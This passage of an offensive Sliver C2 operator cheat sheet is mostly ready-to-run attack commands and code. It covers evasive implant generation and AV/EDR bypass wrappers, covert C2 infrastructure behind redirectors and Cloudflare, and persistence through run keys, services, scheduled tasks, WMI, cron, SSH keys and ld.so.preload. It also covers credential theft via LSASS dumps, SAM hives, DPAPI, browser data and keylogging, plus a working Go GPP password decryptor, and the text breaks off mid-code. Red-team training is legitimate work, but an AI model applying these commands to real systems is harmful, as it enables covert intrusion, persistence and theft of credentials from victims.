generate --evasion --mtls C2_IP:8888 --os windows

# Typical production build: obfuscation (default) plus evasion over HTTPS
generate --evasion --https c2.yourdomain.com --os windows --save /tmp/evade.exe

AMSI / ETW Patching

# AMSI and ETW only matter once .NET code runs in a process. Sliver can patch
# both before loading an assembly, but only in the implant's own process:
execute-assembly --in-process --amsi-bypass --etw-bypass /opt/tools/Seatbelt.exe "-group=system"

# In a sacrificial process (the default) those flags do not apply; bring your own
# patching BOF or loader for that case

Custom Templates & Wrappers

# Generate shellcode and wrap it in an external loader
generate --os windows --format shellcode --mtls C2_IP:8888 --save /tmp/sliver.bin

# Now wrap with: donut, ScareCrow, Nimcrypt2, or a custom Go loader
# Example: ScareCrow wraps the shellcode in a signed-looking binary with sandbox checks
ScareCrow -I /tmp/sliver.bin -Loader binary -domain microsoft.com -O /tmp/wrapped.exe

# Example: donut converts a .NET assembly to position-independent shellcode for injection
# (-f 1 = raw binary output, -a 2 = amd64)
donut -f 1 -i /opt/Rubeus.exe -a 2 -o /tmp/rubeus.bin

# Example: Nimcrypt2 loader around raw shellcode (check `nimcrypt -h` for current flags)
nimcrypt -f /tmp/sliver.bin -t raw -o /tmp/loader.exe

Traffic Shaping (C2 Profiles)

# Create a decoy website, served by an HTTPS listener started with --website
websites add-content --website fake-corp --web-path / --content /var/www/html/index.html --content-type "text/html"

# List websites
websites

# Remove website
websites rm --website fake-corp

# HTTP C2 profile: URIs, file extensions, user-agent, headers, cookies.
# The default profile lives on the server at ~/.sliver/configs/http-c2.json.
# Its defaults (.php/.js/.png paths, a generic Chrome UA) are public and
# signatured, so change them before an engagement.
# Newer 1.5 releases manage several profiles with `c2profiles` and select one at build time:
generate --http c2.yourdomain.com --c2profile myprofile --os windows

OPSEC Checklist

🚨 Always check your C2 domain and IP against threat intel before use. Burned infra = lost access + attribution risk.
✔ Use HTTPS with a real domain + Let's Encrypt cert (not self-signed)
✔ Beacon sleep ≥ 60 s with jitter of roughly a third to a half of the interval (--jitter is in seconds)
✔ Leave obfuscation on (never --skip-symbols outside the lab); add --evasion
✔ Avoid cmd.exe/powershell.exe spawning; use execute-assembly/BOFs
✔ Migrate into stable, non-security processes
✔ Clean up artifacts: delete uploaded tools after use
✔ Put a redirector (nginx or a CDN) in front of the server so the VPS IP is never the callback address
✔ Avoid writing to disk; use in-memory execution
✔ Check domain/IP reputation before use:
   curl https://urlhaus-api.abuse.ch/v1/host/ -d "host=your.domain"
   → VirusTotal, Shodan, Censys checks of the IP
✔ Canary domains: --canary so a lookup from a sandbox or analyst tells you the implant was caught
✔ Guardrails: --limit-datetime for a kill date, --limit-hostname / --limit-domainjoined so it will not run off-target
✔ Log everything on the operator side for deconfliction

C2 Infrastructure Setup (VPS)

# Recommended: Sliver server on a VPS (Njalla, Vultr, etc.)
# Operator connects from Kali → VPS over port 31337 (mTLS)
# Implants connect back over 443 (HTTPS), ideally via a separate redirector host

# Firewall rules on the VPS (UFW example); restrict 31337 and SSH to operator IPs
ufw default deny incoming
ufw allow from OPERATOR_IP to any port 31337 proto tcp   # operator mTLS
ufw allow from OPERATOR_IP to any port 22 proto tcp      # SSH management
ufw allow 443/tcp     # implant HTTPS
ufw allow 53/udp      # implant DNS
ufw enable

# Nginx reverse proxy (optional, as a redirector in front of Sliver)
# Proxy only the C2 URI patterns to Sliver on localhost:8443,
# serve legitimate content for everything else

# Generate LetsEncrypt cert for your domain
certbot certonly --standalone -d c2.yourdomain.com

# Start Sliver with HTTPS using real cert
https --domain c2.yourdomain.com --cert /etc/letsencrypt/live/c2.yourdomain.com/fullchain.pem --key /etc/letsencrypt/live/c2.yourdomain.com/privkey.pem

Armory & Extensions

Extensions

Armory Overview

The Armory is Sliver's built-in package manager for extensions, BOFs, and tool aliases. Extends Sliver with community tools directly inside your C2 client.

# List all available armory packages
armory

# Search for specific tool
armory search rubeus
armory search bof

# Install a package (names as listed by `armory`; a few examples)
armory install rubeus
armory install seatbelt
armory install sharpup
armory install certify
armory install nanodump            # LSASS minidump with signature/fork tricks
armory install coff-loader         # required by BOF packages

# Install everything (large download: every alias and extension)
armory install all

# Update installed packages
armory update

Key Armory Tools After Install

Command      | Tool       | Purpose
rubeus       | Rubeus     | Kerberos abuse: kerberoast, asreproast, ptt, golden/silver
sharp-hound  | SharpHound | BloodHound AD collection
seatbelt     | Seatbelt   | Host-based enumeration & situational awareness
sharp-up     | SharpUp    | Windows privilege escalation checks
certify      | Certify    | ADCS misconfiguration discovery
nanodump     | Nanodump   | LSASS minidump without the procdump API pattern; optional invalid signature, fork and snapshot modes
sharp-dpapi  | SharpDPAPI | DPAPI secrets: browser creds, vault, RDP creds
wmiexec      | WMIExec    | Lateral movement via WMI
sharp-wmi    | SharpWMI   | WMI query & execute

Command names come from each package's manifest and change between armory versions; run `aliases` and `extensions` after installing to see what is registered. Aliases (rubeus, seatbelt, ...) are execute-assembly wrappers, so the same --process / --ppid / --in-process options apply to them.

Manual Extension Installation

# Aliases (execute-assembly wrappers) and extensions (BOFs / native code) are
# directories holding a manifest (alias.json / extension.json) plus the binaries.
# Install from a local directory or .tar.gz
aliases install /path/to/alias/
extensions install /path/to/extension/

# Load an extension for this client run without installing it
extensions load /path/to/extension/

# List installed extensions and aliases
extensions
aliases

Persistence

Persistence

Windows — Registry Run Keys

# registry write takes the full value path (key\ValueName) followed by the data.
# HKCU Run: no admin needed
registry write --hive HKCU --type string "Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate" "C:\Windows\Temp\beacon.exe"

# Verify
registry read --hive HKCU "Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate"

# HKLM Run (needs admin)
registry write --hive HKLM --type string "Software\Microsoft\Windows\CurrentVersion\Run\SvcHost32" "C:\Windows\System32\svchost32.exe"

# Other locations: RunOnce, Winlogon Userinit/Shell. Less common, but not quieter:
# a modified Userinit value is a stock EDR rule. Keep the original entry first
registry write --hive HKLM --type string "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" "C:\Windows\system32\userinit.exe,C:\Temp\beacon.exe"

# Remove during cleanup
execute -o reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /f

Windows — Scheduled Tasks

# Create a scheduled task via execute (runs as SYSTEM; needs admin)
execute -o schtasks /create /tn WindowsDefenderUpdate /tr C:\Windows\Temp\beacon.exe /sc onlogon /ru SYSTEM /f

# Trigger on system start
execute -o schtasks /create /tn SysUpdate /tr C:\Windows\Temp\beacon.exe /sc onstart /ru SYSTEM /f

# Trigger every 15 minutes (repeat)
execute -o schtasks /create /tn NetHealth /tr C:\Windows\Temp\beacon.exe /sc minute /mo 15 /ru SYSTEM /f

# Via SharpPersist (Task Scheduler COM API, so no schtasks.exe in the process tree)
execute-assembly /opt/tools/SharpPersist.exe "-t schtask -c C:\Windows\Temp\beacon.exe -n SysUpdate -m add -o logon"

# List tasks to verify
execute -o schtasks /query /tn SysUpdate

# Remove task during cleanup
execute -o schtasks /delete /tn SysUpdate /f

Windows — Services

# Generate beacon as service EXE
generate beacon --https c2.yourdomain.com --os windows --format service --save /tmp/svc.exe

# Upload and register the service (requires admin). A --format service binary is
# required: a normal EXE is killed by the SCM when it fails to report started
upload /tmp/svc.exe C:\Windows\System32\WindowsUpdateSvc.exe
execute -o sc create WindowsUpdateSvc binpath= C:\Windows\System32\WindowsUpdateSvc.exe start= auto
execute -o sc start WindowsUpdateSvc

# Verify
execute -o sc query WindowsUpdateSvc

# Cleanup (execute does not go through a shell, so no &&)
execute -o sc stop WindowsUpdateSvc
execute -o sc delete WindowsUpdateSvc
rm C:\Windows\System32\WindowsUpdateSvc.exe

Windows — Startup Folder

# User startup (no admin needed)
upload /tmp/beacon.exe "C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\beacon.exe"

# All-users startup (admin needed)
upload /tmp/beacon.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\update.exe"

# Disguise as a shortcut (.lnk) via PowerShell
execute -o powershell -nop -c "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sysupdate.lnk');$s.TargetPath='C:\Windows\Temp\beacon.exe';$s.Save()"
ATT&CK: T1547.001, T1053.005, T1543.003

Linux — Persistence Techniques

# execute does not go through a shell, so pipes, redirects and && need /bin/sh -c

# Cron job (every minute)
execute -o /bin/sh -c "(crontab -l 2>/dev/null; echo '* * * * * /tmp/.update') | crontab -"

# System-level cron (root required)
execute -o /bin/sh -c "echo '* * * * * root /opt/.svc' >> /etc/crontab"

# Systemd service (root): write the unit file on the operator box and upload it
upload /tmp/lin_beacon /opt/.svc
execute -o chmod +x /opt/.svc
upload /tmp/netupdate.service /etc/systemd/system/netupdate.service
execute -o systemctl daemon-reload
execute -o systemctl enable --now netupdate
# /tmp/netupdate.service:
#   [Unit]
#   Description=Network Update
#   [Service]
#   ExecStart=/opt/.svc
#   Restart=always
#   [Install]
#   WantedBy=multi-user.target

# SSH authorized_keys (persistence as a specific user)
execute -o /bin/sh -c "echo 'ssh-rsa AAAA...YOUR_KEY...' >> /home/victim/.ssh/authorized_keys"

# .bashrc / .profile (fires on every interactive login; noisy)
execute -o /bin/sh -c "echo '/tmp/.update &' >> /home/victim/.bashrc"

# LD_PRELOAD hook (root). Loaded into EVERY dynamically linked process, so a bug
# in hook.so breaks the whole box; test against the target's libc and arch first
upload /tmp/hook.so /lib/x86_64-linux-gnu/libsecurity.so
execute -o /bin/sh -c "echo '/lib/x86_64-linux-gnu/libsecurity.so' >> /etc/ld.so.preload"
ATT&CK: T1053.003, T1543.002, T1098.004

WMI Event Subscriptions (Windows, quieter than Run keys)

ℹ️ A permanent WMI subscription is three objects in root\subscription: an __EventFilter (the WQL trigger), a CommandLineEventConsumer (what to run) and a __FilterToConsumerBinding. Nothing lands in Run keys or the task scheduler. It is not invisible: Sysmon events 19/20/21 and the WMI-Activity operational log record exactly these objects.
# Stage the script briefly (or pass it with -EncodedCommand), run it, remove it. Needs admin
upload /tmp/wmi.ps1 C:\Windows\Temp\wmi.ps1
execute -o powershell -nop -ep bypass -f C:\Windows\Temp\wmi.ps1
rm C:\Windows\Temp\wmi.ps1

# /tmp/wmi.ps1 (fires once a day at 12:00 through a Win32_LocalTime poll):
#   $f = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{
#          Name='SysFilter'; EventNameSpace='root\cimv2'; QueryLanguage='WQL';
#          Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 12 AND TargetInstance.Minute = 0" }
#   $c = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{
#          Name='SysConsumer'; CommandLineTemplate='C:\Windows\Temp\beacon.exe' }
#   Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{ Filter=$f; Consumer=$c }

# List subscriptions (the same queries a defender runs; these are cmdlets, so go through powershell)
execute -o powershell -nop -c "Get-WmiObject -Namespace root\subscription -Class __EventFilter"
execute -o powershell -nop -c "Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer"
execute -o powershell -nop -c "Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding"

# Cleanup WMI persistence (binding first, then filter and consumer)
execute -o powershell -nop -c "Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding | Where-Object { $_.Filter -like '*SysFilter*' } | Remove-WmiObject"
execute -o powershell -nop -c "Get-WmiObject -Namespace root\subscription -Class __EventFilter | Where-Object { $_.Name -eq 'SysFilter' } | Remove-WmiObject"
execute -o powershell -nop -c "Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer | Where-Object { $_.Name -eq 'SysConsumer' } | Remove-WmiObject"
ATT&CK: T1546.003
🗝️

Credential Hunting

Creds

LSASS Dump Techniques

⚠️ Opening LSASS with a full-access handle from the implant (procdump, Task Manager) is the most heavily monitored credential action on a Windows host: EDR alerts on the handle open itself, and RunAsPPL / Credential Guard block it outright. Prefer nanodump (armory). The comsvcs.dll route avoids dropping a tool, but rundll32 + comsvcs MiniDump is itself a well-known signature. Every method below needs local admin (SeDebugPrivilege).
─── Method 1: nanodump (armory BOF, runs inside the implant process) ───
armory install nanodump
nanodump --write C:\Windows\Temp\nd.dmp --valid    # --valid keeps a valid minidump header; without it the signature is corrupted so the file is not recognised as a dump in transit, and you restore it with nanodump's restore_signature tool before parsing
nanodump --write C:\Windows\Temp\nd.dmp --fork     # dump a fork of LSASS instead of LSASS itself (no direct handle to the real process)
download C:\Windows\Temp\nd.dmp

─── Method 2: Sliver procdump (built-in; opens LSASS directly, expect EDR alerts) ───
ps | grep lsass             # get LSASS PID
procdump --pid 636 --save /tmp/lsass.dmp

─── Method 3: comsvcs.dll MiniDump via rundll32 (nothing dropped, but the rundll32 + MiniDump pattern is signatured) ───
execute -o "powershell -nop -c \"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Windows\Temp\lsass.dmp full\""
download C:\Windows\Temp\lsass.dmp

─── Offline parsing on Kali ───
# pypykatz (pure Python, no Windows needed)
pypykatz lsa minidump lsass.dmp

# Or: mimikatz on Windows
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonpasswords

SAM / SYSTEM Hive (Local Account Hashes)

# Export the live hives with reg save (goes through the registry API, so the hive file lock is irrelevant; needs local admin; no shadow copy involved)
execute -o "reg save HKLM\SAM C:\Windows\Temp\sam.hiv /y"
execute -o "reg save HKLM\SYSTEM C:\Windows\Temp\sys.hiv /y"
execute -o "reg save HKLM\SECURITY C:\Windows\Temp\sec.hiv /y"
download C:\Windows\Temp\sam.hiv
download C:\Windows\Temp\sys.hiv
download C:\Windows\Temp\sec.hiv

# Extract on Kali
impacket-secretsdump -sam sam.hiv -system sys.hiv -security sec.hiv LOCAL

# In-memory SAM dump via mimikatz (armory alias as used on this page): lsadump::sam reads SAM through the registry and needs a SYSTEM token, so elevate first
armory install mimikatz
mimikatz "privilege::debug" "token::elevate" "lsadump::sam" "exit"
T1003.001 T1003.002

DPAPI — Decrypting Windows Secrets

ℹ️ DPAPI protects: Chrome/Edge saved passwords (through the key in Local State), Wi-Fi profiles, Credential Manager entries including saved RDP logons, Outlook passwords, vault items. User-scope blobs need the user's masterkey, which the implant can use when it runs as that user; machine-scope blobs need SYSTEM. SharpDPAPI (armory alias sharp-dpapi) does the triage.
# Full DPAPI triage (user-context masterkeys plus credential files, vaults, rdg, KeePass)
sharp-dpapi triage

# Machine-context DPAPI (needs SYSTEM): machine masterkeys, machine credentials, vaults, certificates
sharp-dpapi machinetriage

# Credential Manager credential files (%APPDATA%\Microsoft\Credentials), which is where saved TERMSRV/<host> RDP logons live
execute -o "cmdkey /list"                # what Credential Manager says it holds
sharp-dpapi credentials

# Remote Desktop Connection Manager .rdg files
sharp-dpapi rdg

# Vault credentials (Windows Credential Manager web credentials / vault items)
sharp-dpapi vaults

# With DA: pull the domain DPAPI backup key from a DC once; it decrypts every domain user's masterkeys offline, no user password needed
sharp-dpapi backupkey /server:DC01.corp.local /file:domain_backup.pvk
sharp-dpapi masterkeys /pvk:domain_backup.pvk
sharp-dpapi triage /pvk:domain_backup.pvk
T1555.004 T1552.002

Browser Credential Extraction

─── Chrome / Edge (Login Data is SQLite; the AES-GCM key sits DPAPI-protected in Local State) ───
execute-assembly /opt/tools/SharpChrome.exe logins     # SharpChrome (part of the SharpDPAPI project): unprotects the Local State key, decrypts the logins table in place
execute-assembly /opt/tools/SharpChrome.exe cookies    # same for cookies

# Manual: copy both files, decrypt offline (needs the user's DPAPI masterkey or the domain backup key)
download "C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data"
download "C:\Users\victim\AppData\Local\Google\Chrome\User Data\Local State"
# Then: python3 chrome_decrypt.py (many tools available); Edge uses the same layout under AppData\Local\Microsoft\Edge\User Data

─── Firefox (key4.db + logins.json, NSS rather than DPAPI) ───
download "C:\Users\victim\AppData\Roaming\Mozilla\Firefox\Profiles"
# firefox_decrypt.py --export-pass

─── Via Cursed (live browser: cookies straight out of the running process, no decrypt needed) ───
cursed chrome                 # relaunches Chrome with remote debugging enabled; the user sees the browser close and reopen
cursed cookies                # dump cookies from the hijacked instance

─── LaZagne (all-in-one) ───
# LaZagne.exe is a PyInstaller-packed Python program, not a .NET assembly, so execute-assembly cannot load it: it has to land on disk and run (noisy)
upload /opt/tools/LaZagne.exe C:\Windows\Temp\lz.exe
execute -o "C:\Windows\Temp\lz.exe all"
T1555.003T1539

File-Based Credential Hunting

# PowerShell credential files / any .xml that mentions a password (a recursive walk of C:\ is slow and noisy: scope the path)
execute -o "powershell -nop -c \"Get-ChildItem -Path C:\Users -Recurse -Include *.xml -ErrorAction SilentlyContinue | Select-String -Pattern 'password' -List | Select-Object Path\""

# Configuration files containing credentials
execute -o "powershell -nop -c \"Get-ChildItem -Recurse -Path C:\inetpub,C:\xampp,C:\Apache24 -Include web.config,applicationHost.config -ErrorAction SilentlyContinue\""
cat C:\inetpub\wwwroot\web.config

# Unattend.xml / sysprep (often has the local admin password, base64 in the <Password> element)
execute -o "powershell -nop -c \"Get-ChildItem -Path C:\ -Recurse -Include unattend.xml,sysprep.xml -ErrorAction SilentlyContinue\""

# SSH private keys on Windows
execute -o "powershell -nop -c \"Get-ChildItem -Path C:\Users -Recurse -Include id_rsa,id_ecdsa,id_ed25519,*.pem,*.ppk -ErrorAction SilentlyContinue\""

# KeePass database files
execute -o "powershell -nop -c \"Get-ChildItem -Path C:\ -Recurse -Include *.kdbx -ErrorAction SilentlyContinue\""

# GPP passwords in SYSVOL (domain-joined). MS14-025 (2014) stopped the GPP editor from writing new cpassword values but did not
# remove existing ones, so policies created before the patch still leak them.
execute -o "powershell -nop -c \"Get-ChildItem -Path \\DC01\SYSVOL -Recurse -Include Groups.xml,Services.xml,ScheduledTasks.xml,DataSources.xml,Drives.xml,Printers.xml -ErrorAction SilentlyContinue | Select-String -Pattern cpassword -List | Select-Object Path\""
# gpp-decrypt <cpassword>: AES-256-CBC with the key Microsoft published on MSDN, instant decrypt

# Linux: common credential locations
execute -o "find /home /root /etc /var/www -name '*.conf' -o -name '*.env' -o -name '.htpasswd' 2>/dev/null | xargs grep -lE 'pass|secret|key|token' 2>/dev/null"
execute -o "cat /home/*/.ssh/id_rsa 2>/dev/null"
execute -o "cat /home/*/.bash_history 2>/dev/null"
T1552.001T1552.004T1552.006
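Offline decryption of the cpassword values the SYSVOL search above turns up, as an added Go example; this is not Sliver's, gpp-decrypt's or any other tool's code. It does what every gpp-decrypt implementation does: repair the base64 padding the XML attribute drops, AES-256-CBC with the key Microsoft published and an all-zero IV, strip PKCS#7 padding, decode UTF-16LE. The sample cpassword in main() is a value reproduced in many public write-ups (plaintext GPPstillStandingStrong2k18); EncryptCpassword exists only so you can build fixtures of your own.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
	"strings"
	"unicode/utf16"
)

// gppKey is the 32-byte AES key Microsoft published for Group Policy Preferences;
// every gpp-decrypt implementation embeds the same constant.
var gppKey = []byte{
	0x4e, 0x99, 0x06, 0xe8, 0xfc, 0xb6, 0x6c, 0xc9, 0xfa, 0xf4, 0x93, 0x10, 0x62, 0x0f, 0xfe, 0xe8,
	0xf4, 0x96, 0xe8, 0x06, 0xcc, 0x05, 0x79, 0x90, 0x20, 0x9b, 0x09, 0xa4, 0x33, 0xb6, 0x6c, 0x1b,
}

// DecryptCpassword turns a cpassword attribute from Groups.xml / Services.xml / etc.
// back into the plaintext password.
func DecryptCpassword(cpassword string) (string, error) {
	s := strings.TrimSpace(cpassword)
	if pad := len(s) % 4; pad != 0 { // GPP strips the '=' padding from the attribute
		s += strings.Repeat("=", 4-pad)
	}
	ct, err := base64.StdEncoding.DecodeString(s)
	if err != nil {
		return "", fmt.Errorf("cpassword is not valid base64: %w", err)
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext length is not a multiple of the AES block size")
	}
	block, err := aes.NewCipher(gppKey)
	if err != nil {
		return "", err
	}
	iv := make([]byte, aes.BlockSize) // GPP uses an all-zero IV
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	pt, err = pkcs7Unpad(pt)
	if err != nil {
		return "", err
	}
	if len(pt)%2 != 0 {
		return "", errors.New("plaintext is not UTF-16LE")
	}
	u16 := make([]uint16, len(pt)/2)
	for i := range u16 {
		u16[i] = uint16(pt[2*i]) | uint16(pt[2*i+1])<<8
	}
	return string(utf16.Decode(u16)), nil
}

// pkcs7Unpad validates and removes PKCS#7 padding; a bad pad means the input was
// not encrypted with the GPP key (or was mangled in copy-paste).
func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 {
		return nil, errors.New("empty plaintext")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) {
		return nil, errors.New("bad PKCS#7 padding")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad PKCS#7 padding")
		}
	}
	return b[:len(b)-n], nil
}

// EncryptCpassword is the inverse (what the GPP editor did when an admin set the
// password); useful for building test fixtures.
func EncryptCpassword(password string) (string, error) {
	u16 := utf16.Encode([]rune(password))
	pt := make([]byte, 0, 2*len(u16)+aes.BlockSize)
	for _, c := range u16 {
		pt = append(pt, byte(c), byte(c>>8))
	}
	n := aes.BlockSize - len(pt)%aes.BlockSize
	for i := 0; i < n; i++ {
		pt = append(pt, byte(n))
	}
	block, err := aes.NewCipher(gppKey)
	if err != nil {
		return "", err
	}
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(ct, pt)
	return strings.TrimRight(base64.StdEncoding.EncodeToString(ct), "="), nil
}

func main() {
	// Sample cpassword attribute as it appears in SYSVOL XML (public sample value).
	pw, err := DecryptCpassword("edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ")
	if err != nil {
		panic(err)
	}
	fmt.Println(pw) // GPPstillStandingStrong2k18
}
```

Anything that fails the PKCS#7 check was not produced with the GPP key, which catches a truncated paste before you waste time spraying a garbage password.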
📸

Recon Modules

Recon

Screenshot

# Capture current desktop
screenshot
# Saved on the operator box; add --loot to store it in the loot store instead of a local file

# Save to specific path on operator box
screenshot --save /tmp/target-desktop.png

# Loop screenshots (manual — in beacon via tasks)
# Use reaction or a quick loop in interactive session
T1113

Keylogging

# Sliver has no built-in keylogger: start/dump/stop-key-logger style commands belong to other frameworks, not the Sliver implant.
# Run a keylogger as a .NET assembly or BOF inside the implant instead. It stays in memory, but a hook on every keystroke
# (SetWindowsHookEx / GetAsyncKeyState polling) is a classic EDR trigger, so keep the capture window short.
execute-assembly /opt/tools/KeyLogger.exe              # any .NET keylogger of your choice; the path is an example

# Retrieve the log the tool writes (location depends on the tool), then remove it
download C:\Windows\Temp\keys.log
rm C:\Windows\Temp\keys.log
T1056.001

Registry Operations

# Flag names differ between Sliver releases (newer builds take the key path as a positional argument): run registry read --help
# on your build before relying on the exact forms below
# Read a registry value
registry read --hive HKCU --key "Software\Microsoft\Windows\CurrentVersion\Run"

# Read entire key (all values)
registry read --hive HKLM --key "SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"

# Write a registry value
registry write --hive HKCU --key "Software\MyApp" --value "Config" --type string --data "value123"

# Types: string, expandstring, binary, dword, qword, multistring
# Example only: DisableAntiSpyware is ignored by Defender on current Windows builds once Tamper Protection is on, and writing it is a high-confidence alert by itself
registry write --hive HKLM --key "SOFTWARE\Policies\Microsoft\Windows Defender" --value "DisableAntiSpyware" --type dword --data "1"

# Create a new registry key
registry create --hive HKCU --key "Software\NewKey"

# Delete a registry value
registry rm --hive HKCU --key "Software\Microsoft\Windows\CurrentVersion\Run" --value "MaliciousEntry"

# Useful keys to check
# Autorun:    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Services:   HKLM\SYSTEM\CurrentControlSet\Services\
# LSA:        HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
# WDigest:    HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
# Defender:   HKLM\SOFTWARE\Policies\Microsoft\Windows Defender

# Enable WDigest: LSASS then keeps plaintext credentials for logons that happen after the change (pre-Win8.1 behaviour).
# You still need a fresh logon on the box before it pays off, and this exact key write is a textbook detection (Sysmon Event ID 13)
registry write --hive HKLM --key "SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" --value "UseLogonCredential" --type dword --data "1"
T1012T1112

Loot Management

# View all loot collected (files, creds, screenshots)
loot

# Fetch a specific loot item by ID
loot fetch <LOOT_ID>

# Add credentials to loot store manually
creds add --username Administrator --password "Password123!" --host DC01

# Add hash to creds
creds add --username Administrator --hash "aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c"

# View all credentials in store
creds

# List all tracked hosts
hosts

# Detailed host info
hosts <HOST_ID>

Monitor & Reactions (Automation)

The reaction system lets you auto-run Sliver commands when events fire — new session, beacon callback, connection loss, etc.

# Watch all server events live
monitor

# List available event types
reaction

# Auto-run commands when a new session opens
reaction set-session --event session-opened -c "info; whoami; ps"

# Auto-run on new beacon
reaction set-beacon --event beacon-registered -c "info"

# List active reactions
reaction list

# Remove a reaction
reaction unset <REACTION_ID>
🌐

HTTP C2 Profiles & Domain Fronting

Advanced

HTTP C2 Profile (http-c2.json)

Customize the exact HTTP traffic your implants generate — URI paths, headers, cookies, response bodies. Lives at ~/.sliver/configs/http-c2.json.

// ~/.sliver/configs/http-c2.json — key fields
{
  "implant_config": {
    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0",
    "chrome_base_version": 100,
    "headers": [
      { "name": "Accept", "value": "text/html,application/xhtml+xml" },
      { "name": "Accept-Language", "value": "en-US,en;q=0.9" }
    ],
    "url_parameters": [
      { "name": "_", "value": "timestamp" }
    ],
    "extra_urls": [
      { "method": "GET", "path": "/api/v2/health" },
      { "method": "POST", "path": "/api/v2/data" }
    ]
  },
  "server_config": {
    "headers": [
      { "name": "Server", "value": "nginx/1.18.0" },
      { "name": "X-Powered-By", "value": "PHP/7.4.3" }
    ]
  }
}
# Apply the HTTP C2 config when starting listener
https --domain c2.yourdomain.com     # picks up ~/.sliver/configs/http-c2.json, which the server reads at startup
# server_config is applied by the running server; implant_config is compiled into the implant at generate time.
# After editing the file: validate it (python3 -m json.tool ~/.sliver/configs/http-c2.json), restart sliver-server, regenerate implants.

# Serve a decoy website on the root path so anyone browsing the domain gets a plausible page; paths that don't match the profile fall through to it
websites add-content --website decoy --web-path / --content /var/www/html/index.html --content-type "text/html"
https --domain c2.yourdomain.com --website decoy

Domain Fronting via Cloudflare

ℹ️ Classic domain fronting puts a high-reputation hostname in the TLS SNI and your C2 hostname in the HTTP Host header, so the CDN routes to you while the network only sees the front. Google and AWS closed that in 2018, Azure in 2022, and Cloudflare does not support it; treat fronting in that sense as unavailable on the big CDNs. What the steps below set up is CDN-proxied C2: your own domain behind Cloudflare's proxy. Targets talk to Cloudflare IPs, your VPS IP never appears in client telemetry, and reputation is whatever your domain has earned (age and categorise it, or it is worth nothing).
── Setup ──
1. Register your C2 domain (e.g. c2.yourdomain.com)
2. Add to Cloudflare DNS: A record to VPS IP
3. Enable Cloudflare proxy (orange cloud icon)
4. In Cloudflare SSL/TLS, set Full (Cloudflare accepts the self-signed certificate the https listener generates by default) or Full (Strict) if you give the listener a publicly valid cert (https --cert/--key, or --lets-encrypt)
5. Cloudflare now proxies HTTPS: implant → Cloudflare → VPS. Only HTTP(S) listeners can sit behind the proxy; mTLS, WireGuard and DNS listeners need a direct path to the VPS.

Cloudflare terminates TLS, but Sliver's HTTP(S) transport encrypts C2 data at the application layer with a key exchange rooted in a server key baked into the implant, so the CDN seeing the HTTP layer does not expose the session.

── Generate implant pointing to Cloudflare-proxied domain ──
generate beacon --https c2.yourdomain.com --os windows --seconds 60 --jitter 20

── Traffic flow ──
Implant → HTTPS → Cloudflare (trusted CDN IP) → Your VPS
Blue team sees: target → Cloudflare IP (e.g. 104.18.x.x)
     ↑ By IP it is indistinguishable from any other Cloudflare-hosted site; the SNI still says c2.yourdomain.com, so domain categorisation and TLS inspection are what you have to survive

── Optional: Cloudflare Worker as redirector ──
// worker.js: forward only requests that look like the implant, everything else gets a 404.
// Keep the query string: url_parameters from http-c2.json ride in it and the listener expects them.
// ORIGIN is a placeholder for the hostname Cloudflare reaches your listener on (a DNS-only record, not the proxied one).
const ORIGIN = 'https://origin.yourdomain.com';
const IMPLANT_UA = 'Mozilla/5.0 (Windows NT 10.0';   // must match implant_config.user_agent

addEventListener('fetch', event => {
  event.respondWith(handleRequest(event.request));
});

async function handleRequest(request) {
  const ua = request.headers.get('User-Agent') || '';
  if (!ua.startsWith(IMPLANT_UA)) {
    return new Response('404 Not Found', { status: 404 });
  }
  const url = new URL(request.url);
  // same method, headers and body; only the host changes
  return fetch(ORIGIN + url.pathname + url.search, request);
}
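The same gate the Worker applies, as an added Go example that is not Sliver's, Cloudflare's or any project's code, for the case where the redirector is a host you run rather than a Worker: requests carrying the implant's User-Agent and one header from http-c2.json are reverse-proxied to the listener with path, query string, method and body intact; everything else gets a decoy 404 with the same Server header the listener sends, so the two paths look alike from outside. The UA prefix, header, upstream address and decoy body are placeholders to be copied from your own profile; main() runs the check against an in-process stand-in for the listener.

```go
package main

import (
	"fmt"
	"io"
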